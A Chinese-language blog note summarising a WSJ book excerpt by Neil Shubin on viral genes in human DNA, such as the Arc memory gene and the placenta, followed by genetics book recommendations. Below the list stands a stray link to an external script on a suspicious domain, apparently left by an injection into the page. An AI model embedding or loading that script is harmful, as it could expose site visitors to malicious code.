分類
筆記

WSJ: The Viruses That Shaped Our DNA

WSJ 這篇芝加哥大學生物與解剖學教授 Neil Shubin的書摘也值得一讀

重點提到賦予人類記憶力的Arc基因本質就是一種病毒,很可能是因為原始人類感染此病毒後,該病毒的RNA融入人類DNA後才讓我們的記憶力大增。
該文也指出人類的「胎盤」也是來自於病毒改造了人類的基因。


德國科研團隊發現人類身上有85種掌管大腦功能與懷孕的基因都來自於病毒。

人類還有8%的基因是來自於病毒但處於「不被觸發」的態樣與我們和平共處。人類身上病毒基因的量是「人類自身基因」的四倍。這些病毒在早年攻擊了人類,但最終被納入人類基因庫中甚至被馴服,像是那個Arc記憶基因,失去毒性的同時也賦予人類「記憶力」。

—————————–

補充:

站在基因的立場,人類與所有生物不過是延續基因資訊傳遞的工具。
許多看似生理結構遠比人類簡單的物種,擁有比人類更多的基因,例如水稻的基因數量就是人類的1.7倍。

推薦3本我讀過的基因相關科普書籍:
Richard Dawkins的名著「The Selfish Gene 」
Matt Ridley “Genome"
Matt Ridley “The Red Queen: Sex and the Evolution of Human Nature"


https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s